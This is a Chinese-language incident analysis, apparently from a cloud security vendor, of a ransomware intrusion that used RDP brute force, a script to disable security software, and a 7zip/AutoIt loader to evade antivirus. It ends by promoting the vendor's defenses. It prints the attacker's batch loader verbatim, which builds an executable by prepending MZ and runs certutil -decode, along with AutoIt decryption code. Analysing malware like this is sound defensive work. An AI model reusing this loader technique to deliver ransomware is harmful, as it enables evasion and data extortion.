黑客首先通过RDP暴力破解登陆客户机器,获取机器的控制权限。
云安全中心监控到两个位于拉脱维亚里加的IP:188.92.77.15和188.92.79.123 成功登陆主机。
登陆成功后,黑客远程拷贝Killer.bat恶意脚本到主机并执行,该脚本主要功能是关闭安全软件、系统服务等。
黑客开始第一次勒索攻击,植入文件名为SOS.exe的勒索病毒,运行之后被云安全中心主机防御成功拦截。
黑客发现对抗之后,开始使用load加载的免杀绕过方式,植入a.exe,这是一个使用7zip打包后的自解压exe程序,将其解压之后,释放了4个文件:cnbbrnrhi.com、kiwvyrcee.com、lozgzxher.com、qnsdpztxh.com。
其中kiwvyrcee.com是一个批处理文件:
Set byoraiood=Q
ping -n 1 wnmosszxn
<nul set /p ="MZ" > rundll32.com
type cnbbrnrhi.com >> rundll32.com
del cnbbrnrhi.com
certutil -decode lozgzxher.com Q
start /w rundll32.com Q
ping 127.0.0.1 -n 6
cnbbrnrhi.com添加"MZ"之后生成了rundll32.com,它其实是AutoIt.exe,是一个自动化的Windows界面交互的脚本语言解释器,由于本身属于合法程序,黑客可以把恶意代码藏在脚本文件中,从而灵活地执行恶意操作。
lozgzxher.com是一个开源的AutoIt解密脚本,将混淆加密后的勒索病毒qnsdpztxh.com加载到内存中解密执行。其代码执行流如下:
$in = FileOpen("qnsdpztxh.com", BitRotate(2147483648, -$GNWWRZY, "D"))
$FileData = FileRead($in)
$UncryptedData = _Crypt_DecryptData($FileData, $CryptedKey, 0)
qnsdpztxh.com解密后,发现其md5和SOS.exe勒索病毒一致,因此判断黑客尝试通过AutoIt脚本来投递二进制勒索病毒母体,还是未能绕过云安全中心主机防御。
勒索病毒准备关闭数据库等服务,被主机防御成功拦截:
勒索病毒准备加密磁盘文件,被主机防御成功拦截:
应对措施
勒索病毒对企业来说是危害极大的安全风险之一,一旦核心数据或文件被加密,除了缴纳赎金,基本上无法解密。阿里云云安全中心(主机防御)已经实现逐层递进的纵深式防御:
首先借助云上全方位的威胁情报,云安全中心实现了对大量已知勒索病毒的实时防御,在企业主机资源被病毒感染的第一时间进行拦截,避免发生文件被病毒加密而进行勒索的情况;
其次,通过放置诱饵的方式,云安全中心实时捕捉可能的勒索病毒行为,尤其针对新型未知的勒索病毒,一旦识别到有异常加密行为发生,会立刻拦截同时通知用户进行排查,进行清理;
最后,在做好对勒索病毒防御的情况下,云安全中心还支持文件备份服务,能定期对指定文件进行备份,支持按时间按文件版本恢复,在极端情况发生而导致文件被加密时,能够通过文件恢复的方式找回,做到万无一失。